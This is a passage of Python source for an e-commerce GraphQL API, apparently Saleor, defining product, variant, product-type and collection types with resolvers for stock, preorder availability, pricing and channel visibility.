shipping zones that contain this \"\n \"country will be returned. Otherwise, it will return the maximum \"\n \"quantity from all shipping zones. 
\"\n f\"{DEPRECATED_IN_3X_INPUT} Use `address` argument instead.\"\n ),\n ),\n )\n preorder = graphene.Field(\n PreorderData,\n required=False,\n description=(\n \"Preorder data for product variant.\" + ADDED_IN_31 + PREVIEW_FEATURE\n ),\n )\n created = graphene.DateTime(required=True)\n updated_at = graphene.DateTime(required=True)\n\n class Meta:\n default_resolver = ChannelContextType.resolver_with_context\n description = (\n \"Represents a version of a product such as different size or color.\"\n )\n interfaces = [relay.Node, ObjectWithMetadata]\n model = models.ProductVariant\n\n @staticmethod\n def resolve_created(root: ChannelContext[models.ProductVariant], _info):\n return root.node.created_at\n\n @staticmethod\n def resolve_channel(root: ChannelContext[models.Product], _info):\n return root.channel_slug\n\n @staticmethod\n def resolve_stocks(\n root: ChannelContext[models.ProductVariant],\n info,\n address=None,\n country_code=None,\n ):\n if address is not None:\n country_code = address.country\n return StocksWithAvailableQuantityByProductVariantIdCountryCodeAndChannelLoader(\n info.context\n ).load((root.node.id, country_code, root.channel_slug))\n\n @staticmethod\n def resolve_quantity_available(\n root: ChannelContext[models.ProductVariant],\n info,\n address=None,\n country_code=None,\n ):\n if address is not None:\n country_code = address.country\n site = load_site(info.context)\n channel_slug = str(root.channel_slug) if root.channel_slug else None\n\n global_quantity_limit_per_checkout = site.settings.limit_quantity_per_checkout\n\n if root.node.is_preorder_active():\n variant = root.node\n channel_listing = VariantChannelListingByVariantIdAndChannelSlugLoader(\n info.context\n ).load((variant.id, channel_slug))\n\n def calculate_available_per_channel(channel_listing):\n if (\n channel_listing\n and channel_listing.preorder_quantity_threshold is not None\n ):\n if is_reservation_enabled(site.settings):\n quantity_reserved = (\n 
PreorderQuantityReservedByVariantChannelListingIdLoader(\n info.context\n ).load(channel_listing.id)\n )\n\n def calculate_available_channel_quantity_with_reservations(\n reserved_quantity,\n ):\n return max(\n min(\n channel_listing.preorder_quantity_threshold\n - channel_listing.preorder_quantity_allocated\n - reserved_quantity,\n global_quantity_limit_per_checkout or sys.maxsize,\n ),\n 0,\n )\n\n return quantity_reserved.then(\n calculate_available_channel_quantity_with_reservations\n )\n\n return min(\n channel_listing.preorder_quantity_threshold\n - channel_listing.preorder_quantity_allocated,\n global_quantity_limit_per_checkout or sys.maxsize,\n )\n if variant.preorder_global_threshold is not None:\n variant_channel_listings = VariantChannelListingByVariantIdLoader(\n info.context\n ).load(variant.id)\n\n def calculate_available_global(variant_channel_listings):\n if not variant_channel_listings:\n return global_quantity_limit_per_checkout\n global_sold_units = sum(\n channel_listing.preorder_quantity_allocated\n for channel_listing in variant_channel_listings\n )\n\n available_quantity = variant.preorder_global_threshold\n available_quantity -= global_sold_units\n\n if is_reservation_enabled(site.settings):\n quantity_reserved = (\n PreorderQuantityReservedByVariantChannelListingIdLoader(\n info.context\n ).load_many(\n [listing.id for listing in variant_channel_listings]\n )\n )\n\n def calculate_available_global_quantity_with_reservations(\n reserved_quantities,\n ):\n return max(\n min(\n variant.preorder_global_threshold\n - global_sold_units\n - sum(reserved_quantities),\n global_quantity_limit_per_checkout\n or sys.maxsize,\n ),\n 0,\n )\n\n return quantity_reserved.then(\n calculate_available_global_quantity_with_reservations\n )\n\n return min(\n variant.preorder_global_threshold - global_sold_units,\n global_quantity_limit_per_checkout or sys.maxsize,\n )\n\n return variant_channel_listings.then(calculate_available_global)\n\n return 
global_quantity_limit_per_checkout\n\n return channel_listing.then(calculate_available_per_channel)\n\n if not root.node.track_inventory:\n return global_quantity_limit_per_checkout\n\n return AvailableQuantityByProductVariantIdCountryCodeAndChannelSlugLoader(\n info.context\n ).load((root.node.id, country_code, channel_slug))\n\n @staticmethod\n def resolve_digital_content(root: ChannelContext[models.ProductVariant], _info):\n return getattr(root.node, \"digital_content\", None)\n\n @staticmethod\n def resolve_attributes(\n root: ChannelContext[models.ProductVariant],\n info,\n variant_selection: Optional[str] = None,\n ):\n def apply_variant_selection_filter(selected_attributes):\n if not variant_selection or variant_selection == VariantAttributeScope.ALL:\n return selected_attributes\n attributes = [\n (selected_att[\"attribute\"], selected_att[\"variant_selection\"])\n for selected_att in selected_attributes\n ]\n variant_selection_attrs = [\n attr for attr, _ in get_variant_selection_attributes(attributes)\n ]\n\n if variant_selection == VariantAttributeScope.VARIANT_SELECTION:\n return [\n selected_attribute\n for selected_attribute in selected_attributes\n if selected_attribute[\"attribute\"] in variant_selection_attrs\n ]\n return [\n selected_attribute\n for selected_attribute in selected_attributes\n if selected_attribute[\"attribute\"] not in variant_selection_attrs\n ]\n\n return (\n SelectedAttributesByProductVariantIdLoader(info.context)\n .load(root.node.id)\n .then(apply_variant_selection_filter)\n )\n\n @staticmethod\n def resolve_channel_listings(root: ChannelContext[models.ProductVariant], info):\n return VariantChannelListingByVariantIdLoader(info.context).load(root.node.id)\n\n @staticmethod\n def resolve_pricing(\n root: ChannelContext[models.ProductVariant], info, *, address=None\n ):\n if not root.channel_slug:\n return None\n\n channel_slug = str(root.channel_slug)\n context = info.context\n\n product = 
ProductByIdLoader(context).load(root.node.product_id)\n product_channel_listing = ProductChannelListingByProductIdAndChannelSlugLoader(\n context\n ).load((root.node.product_id, channel_slug))\n variant_channel_listing = VariantChannelListingByVariantIdAndChannelSlugLoader(\n context\n ).load((root.node.id, channel_slug))\n collections = CollectionsByProductIdLoader(context).load(root.node.product_id)\n channel = ChannelBySlugLoader(context).load(channel_slug)\n\n address_country = address.country if address is not None else None\n manager = load_plugin_manager(info.context)\n\n def calculate_pricing_info(discounts):\n def calculate_pricing_with_channel(channel):\n def calculate_pricing_with_product_variant_channel_listings(\n variant_channel_listing,\n ):\n def calculate_pricing_with_product(product):\n def calculate_pricing_with_product_channel_listings(\n product_channel_listing,\n ):\n def calculate_pricing_with_collections(collections):\n if (\n not variant_channel_listing\n or not product_channel_listing\n ):\n return None\n\n country_code = (\n address_country or channel.default_country.code\n )\n\n local_currency = None\n local_currency = get_currency_for_country(country_code)\n\n availability = get_variant_availability(\n variant=root.node,\n variant_channel_listing=variant_channel_listing,\n product=product,\n product_channel_listing=product_channel_listing,\n collections=collections,\n discounts=discounts,\n channel=channel,\n country=Country(country_code),\n local_currency=local_currency,\n plugins=manager,\n )\n return VariantPricingInfo(**asdict(availability))\n\n return collections.then(calculate_pricing_with_collections)\n\n return product_channel_listing.then(\n calculate_pricing_with_product_channel_listings\n )\n\n return product.then(calculate_pricing_with_product)\n\n return variant_channel_listing.then(\n calculate_pricing_with_product_variant_channel_listings\n )\n\n return channel.then(calculate_pricing_with_channel)\n\n return (\n 
DiscountsByDateTimeLoader(context)\n .load(info.context.request_time)\n .then(calculate_pricing_info)\n )\n\n @staticmethod\n def resolve_product(root: ChannelContext[models.ProductVariant], info):\n product = ProductByIdLoader(info.context).load(root.node.product_id)\n return product.then(\n lambda product: ChannelContext(node=product, channel_slug=root.channel_slug)\n )\n\n @staticmethod\n def resolve_quantity_ordered(root: ChannelContext[models.ProductVariant], _info):\n # This field is added through annotation when using the\n # `resolve_report_product_sales` resolver.\n return getattr(root.node, \"quantity_ordered\", None)\n\n @staticmethod\n @traced_resolver\n def resolve_revenue(root: ChannelContext[models.ProductVariant], info, *, period):\n start_date = reporting_period_to_date(period)\n variant = root.node\n channel_slug = root.channel_slug\n\n def calculate_revenue_with_channel(channel):\n if not channel:\n return None\n\n def calculate_revenue_with_order_lines(order_lines):\n def calculate_revenue_with_orders(orders):\n orders_dict = {order.id: order for order in orders}\n return calculate_revenue_for_variant(\n variant,\n start_date,\n order_lines,\n orders_dict,\n channel.currency_code,\n )\n\n order_ids = [order_line.order_id for order_line in order_lines]\n return (\n OrderByIdLoader(info.context)\n .load_many(order_ids)\n .then(calculate_revenue_with_orders)\n )\n\n return (\n OrderLinesByVariantIdAndChannelIdLoader(info.context)\n .load((variant.id, channel.id))\n .then(calculate_revenue_with_order_lines)\n )\n\n return (\n ChannelBySlugLoader(info.context)\n .load(channel_slug)\n .then(calculate_revenue_with_channel)\n )\n\n @staticmethod\n def resolve_media(root: ChannelContext[models.ProductVariant], info):\n return MediaByProductVariantIdLoader(info.context).load(root.node.id)\n\n @staticmethod\n def resolve_images(root: ChannelContext[models.ProductVariant], info):\n return ImagesByProductVariantIdLoader(info.context).load(root.node.id)\n\n 
@staticmethod\n def resolve_weight(root: ChannelContext[models.ProductVariant], _info):\n return convert_weight_to_default_weight_unit(root.node.weight)\n\n @staticmethod\n @traced_resolver\n def resolve_preorder(root: ChannelContext[models.ProductVariant], info):\n variant = root.node\n\n variant_channel_listings = VariantChannelListingByVariantIdLoader(\n info.context\n ).load(variant.id)\n\n def calculate_global_sold_units(variant_channel_listings):\n global_sold_units = sum(\n channel_listing.preorder_quantity_allocated\n for channel_listing in variant_channel_listings\n )\n return (\n PreorderData(\n global_threshold=variant.preorder_global_threshold,\n global_sold_units=global_sold_units,\n end_date=variant.preorder_end_date,\n )\n if variant.is_preorder_active()\n else None\n )\n\n return variant_channel_listings.then(calculate_global_sold_units)\n\n @staticmethod\n def __resolve_references(roots: List[\"ProductVariant\"], info):\n requestor = get_user_or_app_from_context(info.context)\n requestor_has_access_to_all = has_one_of_permissions(\n requestor, ALL_PRODUCTS_PERMISSIONS\n )\n\n channels = defaultdict(set)\n roots_ids = []\n for root in roots:\n roots_ids.append(f\"{root.channel}_{root.id}\")\n channels[root.channel].add(root.id)\n\n variants = {}\n for channel, ids in channels.items():\n qs = resolve_product_variants(\n info,\n requestor_has_access_to_all,\n requestor,\n ids=ids,\n channel_slug=channel,\n ).qs\n for variant in qs:\n global_id = graphene.Node.to_global_id(\"ProductVariant\", variant.id)\n variants[f\"{channel}_{global_id}\"] = ChannelContext(\n channel_slug=channel, node=variant\n )\n\n return [variants.get(root_id) for root_id in roots_ids]\n\n\nclass ProductVariantCountableConnection(CountableConnection):\n class Meta:\n node = ProductVariant\n\n\n@federated_entity(\"id channel\")\nclass Product(ChannelContextTypeWithMetadata, ModelObjectType):\n id = graphene.GlobalID(required=True)\n seo_title = graphene.String()\n seo_description 
= graphene.String()\n name = graphene.String(required=True)\n description = JSONString(description=\"Description of the product.\" + RICH_CONTENT)\n product_type = graphene.Field(lambda: ProductType, required=True)\n slug = graphene.String(required=True)\n category = graphene.Field(lambda: Category)\n created = graphene.DateTime(required=True)\n updated_at = graphene.DateTime(required=True)\n charge_taxes = graphene.Boolean(required=True)\n weight = graphene.Field(Weight)\n default_variant = graphene.Field(ProductVariant)\n rating = graphene.Float()\n channel = graphene.String(\n description=(\n \"Channel given to retrieve this product. Also used by federation \"\n \"gateway to resolve this object in a federated query.\"\n ),\n )\n description_json = JSONString(\n description=\"Description of the product.\" + RICH_CONTENT,\n deprecation_reason=(\n f\"{DEPRECATED_IN_3X_FIELD} Use the `description` field instead.\"\n ),\n )\n thumbnail = ThumbnailField()\n pricing = graphene.Field(\n ProductPricingInfo,\n address=destination_address_argument,\n description=(\n \"Lists the storefront product's pricing, the current price and discounts, \"\n \"only meant for displaying.\"\n ),\n )\n is_available = graphene.Boolean(\n address=destination_address_argument,\n description=\"Whether the product is in stock and visible or not.\",\n )\n tax_type = graphene.Field(\n TaxType, description=\"A type of tax. 
Assigned by enabled tax gateway\"\n )\n attributes = NonNullList(\n SelectedAttribute,\n required=True,\n description=\"List of attributes assigned to this product.\",\n )\n channel_listings = PermissionsField(\n NonNullList(ProductChannelListing),\n description=\"List of availability in channels for the product.\",\n permissions=[ProductPermissions.MANAGE_PRODUCTS],\n )\n media_by_id = graphene.Field(\n lambda: ProductMedia,\n id=graphene.Argument(graphene.ID, description=\"ID of a product media.\"),\n description=\"Get a single product media by ID.\",\n )\n image_by_id = graphene.Field(\n lambda: ProductImage,\n id=graphene.Argument(graphene.ID, description=\"ID of a product image.\"),\n description=\"Get a single product image by ID.\",\n deprecation_reason=(\n f\"{DEPRECATED_IN_3X_FIELD} Use the `mediaById` field instead.\"\n ),\n )\n variants = NonNullList(\n ProductVariant,\n description=(\n \"List of variants for the product. Requires the following permissions to \"\n \"include the unpublished items: \"\n f\"{', '.join([p.name for p in ALL_PRODUCTS_PERMISSIONS])}.\"\n ),\n )\n media = NonNullList(\n lambda: ProductMedia,\n description=\"List of media for the product.\",\n )\n images = NonNullList(\n lambda: ProductImage,\n description=\"List of images for the product.\",\n deprecation_reason=f\"{DEPRECATED_IN_3X_FIELD} Use the `media` field instead.\",\n )\n collections = NonNullList(\n lambda: Collection,\n description=(\n \"List of collections for the product. 
Requires the following permissions \"\n \"to include the unpublished items: \"\n f\"{', '.join([p.name for p in ALL_PRODUCTS_PERMISSIONS])}.\"\n ),\n )\n translation = TranslationField(\n ProductTranslation,\n type_name=\"product\",\n resolver=ChannelContextType.resolve_translation,\n )\n available_for_purchase = graphene.Date(\n description=\"Date when product is available for purchase.\",\n deprecation_reason=(\n f\"{DEPRECATED_IN_3X_FIELD} \"\n \"Use the `availableForPurchaseAt` field to fetch \"\n \"the available for purchase date.\"\n ),\n )\n available_for_purchase_at = graphene.DateTime(\n description=\"Date when product is available for purchase.\"\n )\n is_available_for_purchase = graphene.Boolean(\n description=\"Whether the product is available for purchase.\"\n )\n\n class Meta:\n default_resolver = ChannelContextType.resolver_with_context\n description = \"Represents an individual item for sale in the storefront.\"\n interfaces = [relay.Node, ObjectWithMetadata]\n model = models.Product\n\n @staticmethod\n def resolve_created(root: ChannelContext[models.Product], _info):\n created_at = root.node.created_at\n return created_at\n\n @staticmethod\n def resolve_channel(root: ChannelContext[models.Product], _info):\n return root.channel_slug\n\n @staticmethod\n def resolve_default_variant(root: ChannelContext[models.Product], info):\n default_variant_id = root.node.default_variant_id\n if default_variant_id is None:\n return None\n\n def return_default_variant_with_channel_context(variant):\n return ChannelContext(node=variant, channel_slug=root.channel_slug)\n\n return (\n ProductVariantByIdLoader(info.context)\n .load(default_variant_id)\n .then(return_default_variant_with_channel_context)\n )\n\n @staticmethod\n def resolve_category(root: ChannelContext[models.Product], info):\n category_id = root.node.category_id\n if category_id is None:\n return None\n return CategoryByIdLoader(info.context).load(category_id)\n\n @staticmethod\n def 
resolve_description_json(root: ChannelContext[models.Product], _info):\n description = root.node.description\n return description if description is not None else {}\n\n @staticmethod\n def resolve_tax_type(root: ChannelContext[models.Product], info):\n manager = load_plugin_manager(info.context)\n tax_data = manager.get_tax_code_from_object_meta(root.node)\n return TaxType(tax_code=tax_data.code, description=tax_data.description)\n\n @staticmethod\n @traced_resolver\n def resolve_thumbnail(\n root: ChannelContext[models.Product], info, *, size=256, format=None\n ):\n format = format.lower() if format else None\n size = get_thumbnail_size(size)\n\n def return_first_thumbnail(product_media):\n if not product_media:\n return None\n\n image = product_media[0]\n oembed_data = image.oembed_data\n\n if oembed_data.get(\"thumbnail_url\"):\n return Image(alt=oembed_data[\"title\"], url=oembed_data[\"thumbnail_url\"])\n\n def _resolve_url(thumbnail):\n url = get_image_or_proxy_url(\n thumbnail, image.id, \"ProductMedia\", size, format\n )\n return Image(alt=image.alt, url=build_absolute_uri(url))\n\n return (\n ThumbnailByProductMediaIdSizeAndFormatLoader(info.context)\n .load((image.id, size, format))\n .then(_resolve_url)\n )\n\n return (\n MediaByProductIdLoader(info.context)\n .load(root.node.id)\n .then(return_first_thumbnail)\n )\n\n @staticmethod\n def resolve_url(_root, _info):\n return \"\"\n\n @staticmethod\n def resolve_pricing(root: ChannelContext[models.Product], info, *, address=None):\n if not root.channel_slug:\n return None\n\n channel_slug = str(root.channel_slug)\n context = info.context\n\n product_channel_listing = ProductChannelListingByProductIdAndChannelSlugLoader(\n context\n ).load((root.node.id, channel_slug))\n variants = ProductVariantsByProductIdLoader(context).load(root.node.id)\n variants_channel_listing = (\n VariantsChannelListingByProductIdAndChannelSlugLoader(context).load(\n (root.node.id, channel_slug)\n )\n )\n collections = 
CollectionsByProductIdLoader(context).load(root.node.id)\n channel = ChannelBySlugLoader(context).load(channel_slug)\n\n address_country = address.country if address is not None else None\n manager = load_plugin_manager(info.context)\n\n def calculate_pricing_info(discounts):\n def calculate_pricing_with_channel(channel):\n def calculate_pricing_with_product_channel_listings(\n product_channel_listing,\n ):\n def calculate_pricing_with_variants(variants):\n def calculate_pricing_with_variants_channel_listings(\n variants_channel_listing,\n ):\n def calculate_pricing_with_collections(collections):\n if not variants_channel_listing:\n return None\n\n local_currency = None\n country_code = (\n address_country or channel.default_country.code\n )\n local_currency = get_currency_for_country(country_code)\n\n availability = get_product_availability(\n product=root.node,\n product_channel_listing=product_channel_listing,\n variants=variants,\n variants_channel_listing=variants_channel_listing,\n collections=collections,\n discounts=discounts,\n channel=channel,\n manager=manager,\n country=Country(country_code),\n local_currency=local_currency,\n )\n return ProductPricingInfo(**asdict(availability))\n\n return collections.then(calculate_pricing_with_collections)\n\n return variants_channel_listing.then(\n calculate_pricing_with_variants_channel_listings\n )\n\n return variants.then(calculate_pricing_with_variants)\n\n return product_channel_listing.then(\n calculate_pricing_with_product_channel_listings\n )\n\n return channel.then(calculate_pricing_with_channel)\n\n return (\n DiscountsByDateTimeLoader(context)\n .load(info.context.request_time)\n .then(calculate_pricing_info)\n )\n\n @staticmethod\n @traced_resolver\n def resolve_is_available(\n root: ChannelContext[models.Product], info, *, address=None\n ):\n if not root.channel_slug:\n return None\n\n channel_slug = str(root.channel_slug)\n country_code = address.country if address is not None else None\n\n requestor = 
get_user_or_app_from_context(info.context)\n\n has_required_permissions = has_one_of_permissions(\n requestor, ALL_PRODUCTS_PERMISSIONS\n )\n\n def calculate_is_available(quantities):\n for qty in quantities:\n if qty > 0:\n return True\n return False\n\n def load_variants_availability(variants):\n keys = [(variant.id, country_code, channel_slug) for variant in variants]\n return AvailableQuantityByProductVariantIdCountryCodeAndChannelSlugLoader(\n info.context\n ).load_many(keys)\n\n def check_variant_availability():\n if has_required_permissions and not channel_slug:\n variants = ProductVariantsByProductIdLoader(info.context).load(\n root.node.id\n )\n elif has_required_permissions and channel_slug:\n variants = ProductVariantsByProductIdAndChannel(info.context).load(\n (root.node.id, channel_slug)\n )\n else:\n variants = AvailableProductVariantsByProductIdAndChannel(\n info.context\n ).load((root.node.id, channel_slug))\n return variants.then(load_variants_availability).then(\n calculate_is_available\n )\n\n def check_is_available_for_purchase(product_channel_listing):\n if product_channel_listing:\n if product_channel_listing.is_available_for_purchase():\n return check_variant_availability()\n return False\n\n return (\n ProductChannelListingByProductIdAndChannelSlugLoader(info.context)\n .load((root.node.id, channel_slug))\n .then(check_is_available_for_purchase)\n )\n\n @staticmethod\n def resolve_attributes(root: ChannelContext[models.Product], info):\n return SelectedAttributesByProductIdLoader(info.context).load(root.node.id)\n\n @staticmethod\n def resolve_media_by_id(root: ChannelContext[models.Product], _info, *, id):\n _type, pk = from_global_id_or_error(id, ProductMedia)\n return root.node.media.filter(pk=pk).first()\n\n @staticmethod\n def resolve_image_by_id(root: ChannelContext[models.Product], _info, *, id):\n _type, pk = from_global_id_or_error(id, ProductImage)\n return root.node.media.filter(pk=pk).first()\n\n @staticmethod\n def 
resolve_media(root: ChannelContext[models.Product], info):\n return MediaByProductIdLoader(info.context).load(root.node.id)\n\n @staticmethod\n def resolve_images(root: ChannelContext[models.Product], info):\n return ImagesByProductIdLoader(info.context).load(root.node.id)\n\n @staticmethod\n def resolve_variants(root: ChannelContext[models.Product], info):\n requestor = get_user_or_app_from_context(info.context)\n has_required_permissions = has_one_of_permissions(\n requestor, ALL_PRODUCTS_PERMISSIONS\n )\n if has_required_permissions and not root.channel_slug:\n variants = ProductVariantsByProductIdLoader(info.context).load(root.node.id)\n elif has_required_permissions and root.channel_slug:\n variants = ProductVariantsByProductIdAndChannel(info.context).load(\n (root.node.id, root.channel_slug)\n )\n else:\n variants = AvailableProductVariantsByProductIdAndChannel(info.context).load(\n (root.node.id, root.channel_slug)\n )\n\n def map_channel_context(variants):\n return [\n ChannelContext(node=variant, channel_slug=root.channel_slug)\n for variant in variants\n ]\n\n return variants.then(map_channel_context)\n\n @staticmethod\n def resolve_channel_listings(root: ChannelContext[models.Product], info):\n return ProductChannelListingByProductIdLoader(info.context).load(root.node.id)\n\n @staticmethod\n @traced_resolver\n def resolve_collections(root: ChannelContext[models.Product], info):\n requestor = get_user_or_app_from_context(info.context)\n\n has_required_permissions = has_one_of_permissions(\n requestor, ALL_PRODUCTS_PERMISSIONS\n )\n\n def return_collections(collections):\n if has_required_permissions:\n return [\n ChannelContext(node=collection, channel_slug=root.channel_slug)\n for collection in collections\n ]\n\n dataloader_keys = [\n (collection.id, str(root.channel_slug)) for collection in collections\n ]\n CollectionChannelListingLoader = (\n CollectionChannelListingByCollectionIdAndChannelSlugLoader\n )\n channel_listings = 
CollectionChannelListingLoader(info.context).load_many(\n dataloader_keys\n )\n\n def return_visible_collections(channel_listings):\n visible_collections = []\n channel_listings_dict = {\n channel_listing.collection_id: channel_listing\n for channel_listing in channel_listings\n if channel_listing\n }\n\n for collection in collections:\n channel_listing = channel_listings_dict.get(collection.id)\n if channel_listing and channel_listing.is_visible:\n visible_collections.append(collection)\n\n return [\n ChannelContext(node=collection, channel_slug=root.channel_slug)\n for collection in visible_collections\n ]\n\n return channel_listings.then(return_visible_collections)\n\n return (\n CollectionsByProductIdLoader(info.context)\n .load(root.node.id)\n .then(return_collections)\n )\n\n @staticmethod\n def resolve_weight(root: ChannelContext[models.Product], _info):\n return convert_weight_to_default_weight_unit(root.node.weight)\n\n @staticmethod\n @traced_resolver\n def resolve_is_available_for_purchase(root: ChannelContext[models.Product], info):\n if not root.channel_slug:\n return None\n channel_slug = str(root.channel_slug)\n\n def calculate_is_available_for_purchase(product_channel_listing):\n if not product_channel_listing:\n return None\n return product_channel_listing.is_available_for_purchase()\n\n return (\n ProductChannelListingByProductIdAndChannelSlugLoader(info.context)\n .load((root.node.id, channel_slug))\n .then(calculate_is_available_for_purchase)\n )\n\n @staticmethod\n @traced_resolver\n def resolve_available_for_purchase(root: ChannelContext[models.Product], info):\n if not root.channel_slug:\n return None\n channel_slug = str(root.channel_slug)\n\n def calculate_available_for_purchase(product_channel_listing):\n if not product_channel_listing:\n return None\n return product_channel_listing.available_for_purchase_at\n\n return (\n ProductChannelListingByProductIdAndChannelSlugLoader(info.context)\n .load((root.node.id, channel_slug))\n 
.then(calculate_available_for_purchase)\n )\n\n @staticmethod\n @traced_resolver\n def resolve_available_for_purchase_at(root: ChannelContext[models.Product], info):\n if not root.channel_slug:\n return None\n channel_slug = str(root.channel_slug)\n\n def calculate_available_for_purchase(product_channel_listing):\n if not product_channel_listing:\n return None\n return product_channel_listing.available_for_purchase_at\n\n return (\n ProductChannelListingByProductIdAndChannelSlugLoader(info.context)\n .load((root.node.id, channel_slug))\n .then(calculate_available_for_purchase)\n )\n\n @staticmethod\n def resolve_product_type(root: ChannelContext[models.Product], info):\n return ProductTypeByIdLoader(info.context).load(root.node.product_type_id)\n\n @staticmethod\n def __resolve_references(roots: List[\"Product\"], info):\n requestor = get_user_or_app_from_context(info.context)\n channels = defaultdict(set)\n roots_ids = []\n for root in roots:\n _, root_id = from_global_id_or_error(root.id, Product, raise_error=True)\n if root_id:\n roots_ids.append(f\"{root.channel}_{root_id}\")\n channels[root.channel].add(root_id)\n\n products = {}\n for channel, ids in channels.items():\n queryset = resolve_products(\n info, requestor, channel_slug=channel\n ).qs.filter(id__in=ids)\n\n for product in queryset:\n products[f\"{channel}_{product.id}\"] = ChannelContext(\n channel_slug=channel, node=product\n )\n\n return [products.get(root_id) for root_id in roots_ids]\n\n\nclass ProductCountableConnection(CountableConnection):\n class Meta:\n node = Product\n\n\n@federated_entity(\"id\")\nclass ProductType(ModelObjectType):\n id = graphene.GlobalID(required=True)\n name = graphene.String(required=True)\n slug = graphene.String(required=True)\n has_variants = graphene.Boolean(required=True)\n is_shipping_required = graphene.Boolean(required=True)\n is_digital = graphene.Boolean(required=True)\n weight = graphene.Field(Weight)\n kind = ProductTypeKindEnum(description=\"The product 
type kind.\", required=True)\n products = ConnectionField(\n ProductCountableConnection,\n channel=graphene.String(\n description=\"Slug of a channel for which the data should be returned.\"\n ),\n description=\"List of products of this type.\",\n deprecation_reason=(\n f\"{DEPRECATED_IN_3X_FIELD} \"\n \"Use the top-level `products` query with the `productTypes` filter.\"\n ),\n )\n tax_type = graphene.Field(\n TaxType, description=\"A type of tax. Assigned by enabled tax gateway\"\n )\n variant_attributes = NonNullList(\n Attribute,\n description=\"Variant attributes of that product type.\",\n variant_selection=graphene.Argument(\n VariantAttributeScope,\n description=\"Define scope of returned attributes.\",\n ),\n deprecation_reason=(\n f\"{DEPRECATED_IN_3X_FIELD} Use `assignedVariantAttributes` instead.\"\n ),\n )\n assigned_variant_attributes = NonNullList(\n AssignedVariantAttribute,\n description=(\n \"Variant attributes of that product type with attached variant selection.\"\n + ADDED_IN_31\n ),\n variant_selection=graphene.Argument(\n VariantAttributeScope,\n description=\"Define scope of returned attributes.\",\n ),\n )\n product_attributes = NonNullList(\n Attribute, description=\"Product attributes of that product type.\"\n )\n available_attributes = FilterConnectionField(\n AttributeCountableConnection,\n filter=AttributeFilterInput(),\n description=\"List of attributes which can be assigned to this product type.\",\n permissions=[ProductPermissions.MANAGE_PRODUCTS],\n )\n\n class Meta:\n description = (\n \"Represents a type of product. 
It defines what attributes are available to \"\n \"products of this type.\"\n )\n interfaces = [relay.Node, ObjectWithMetadata]\n model = models.ProductType\n\n @staticmethod\n def resolve_tax_type(root: models.ProductType, info):\n manager = load_plugin_manager(info.context)\n tax_data = manager.get_tax_code_from_object_meta(root)\n return TaxType(tax_code=tax_data.code, description=tax_data.description)\n\n @staticmethod\n def resolve_product_attributes(root: models.ProductType, info):\n def unpack_attributes(attributes):\n return [attr for attr, *_ in attributes]\n\n return (\n ProductAttributesByProductTypeIdLoader(info.context)\n .load(root.pk)\n .then(unpack_attributes)\n )\n\n @staticmethod\n @traced_resolver\n def resolve_variant_attributes(\n root: models.ProductType,\n info,\n variant_selection: Optional[str] = None,\n ):\n def apply_variant_selection_filter(attributes):\n if not variant_selection or variant_selection == VariantAttributeScope.ALL:\n return [attr for attr, *_ in attributes]\n variant_selection_attrs = get_variant_selection_attributes(attributes)\n if variant_selection == VariantAttributeScope.VARIANT_SELECTION:\n return [attr for attr, *_ in variant_selection_attrs]\n return [\n attr\n for attr, variant_selection in attributes\n if (attr, variant_selection) not in variant_selection_attrs\n ]\n\n return (\n VariantAttributesByProductTypeIdLoader(info.context)\n .load(root.pk)\n .then(apply_variant_selection_filter)\n )\n\n @staticmethod\n @traced_resolver\n def resolve_assigned_variant_attributes(\n root: models.ProductType,\n info,\n variant_selection: Optional[str] = None,\n ):\n def apply_variant_selection_filter(attributes):\n if not variant_selection or variant_selection == VariantAttributeScope.ALL:\n return [\n {\"attribute\": attr, \"variant_selection\": variant_selection}\n for attr, variant_selection in attributes\n ]\n variant_selection_attrs = get_variant_selection_attributes(attributes)\n if variant_selection == 
VariantAttributeScope.VARIANT_SELECTION:\n return [\n {\"attribute\": attr, \"variant_selection\": variant_selection}\n for attr, variant_selection in variant_selection_attrs\n ]\n return [\n {\"attribute\": attr, \"variant_selection\": variant_selection}\n for attr, variant_selection in attributes\n if (attr, variant_selection) not in variant_selection_attrs\n ]\n\n return (\n VariantAttributesByProductTypeIdLoader(info.context)\n .load(root.pk)\n .then(apply_variant_selection_filter)\n )\n\n @staticmethod\n def resolve_products(root: models.ProductType, info, *, channel=None, **kwargs):\n requestor = get_user_or_app_from_context(info.context)\n if channel is None:\n channel = get_default_channel_slug_or_graphql_error()\n qs = root.products.visible_to_user(requestor, channel) # type: ignore\n qs = ChannelQsContext(qs=qs, channel_slug=channel)\n kwargs[\"channel\"] = channel\n return create_connection_slice(qs, info, kwargs, ProductCountableConnection)\n\n @staticmethod\n def resolve_available_attributes(root: models.ProductType, info, **kwargs):\n qs = attribute_models.Attribute.objects.get_unassigned_product_type_attributes(\n root.pk\n )\n qs = resolve_attributes(info, qs=qs)\n qs = filter_connection_queryset(qs, kwargs, info.context)\n return create_connection_slice(qs, info, kwargs, AttributeCountableConnection)\n\n @staticmethod\n def resolve_weight(root: models.ProductType, _info):\n return convert_weight_to_default_weight_unit(root.weight)\n\n @staticmethod\n def __resolve_references(roots: List[\"ProductType\"], _info):\n return resolve_federation_references(\n ProductType, roots, models.ProductType.objects\n )\n\n\nclass ProductTypeCountableConnection(CountableConnection):\n class Meta:\n node = ProductType\n\n\n@federated_entity(\"id channel\")\nclass Collection(ChannelContextTypeWithMetadata, ModelObjectType):\n id = graphene.GlobalID(required=True)\n seo_title = graphene.String()\n seo_description = graphene.String()\n name = 
graphene.String(required=True)\n description = JSONString(\n description=\"Description of the collection.\" + RICH_CONTENT\n )\n slug = graphene.String(required=True)\n channel = graphene.String(\n description=(\n \"Channel given to retrieve this collection. Also used by federation \"\n \"gateway to resolve this object in a federated query.\"\n ),\n )\n description_json = JSONString(\n description=\"Description of the collection.\" + RICH_CONTENT,\n deprecation_reason=(\n f\"{DEPRECATED_IN_3X_FIELD} Use the `description` field instead.\"\n ),\n )\n products = FilterConnectionField(\n ProductCountableConnection,\n filter=ProductFilterInput(description=\"Filtering options for products.\"),\n sort_by=ProductOrder(description=\"Sort products.\"),\n description=\"List of products in this collection.\",\n )\n background_image = ThumbnailField()\n translation = TranslationField(\n CollectionTranslation,\n type_name=\"collection\",\n resolver=ChannelContextType.resolve_translation,\n )\n channel_listings = PermissionsField(\n NonNullList(CollectionChannelListing),\n description=\"List of channels in which the collection is available.\",\n permissions=[\n ProductPermissions.MANAGE_PRODUCTS,\n ],\n )\n\n class Meta:\n default_resolver = ChannelContextType.resolver_with_context\n description = \"Represents a collection of products.\"\n interfaces = [relay.Node, ObjectWithMetadata]\n model = models.Collection\n\n @staticmethod\n def 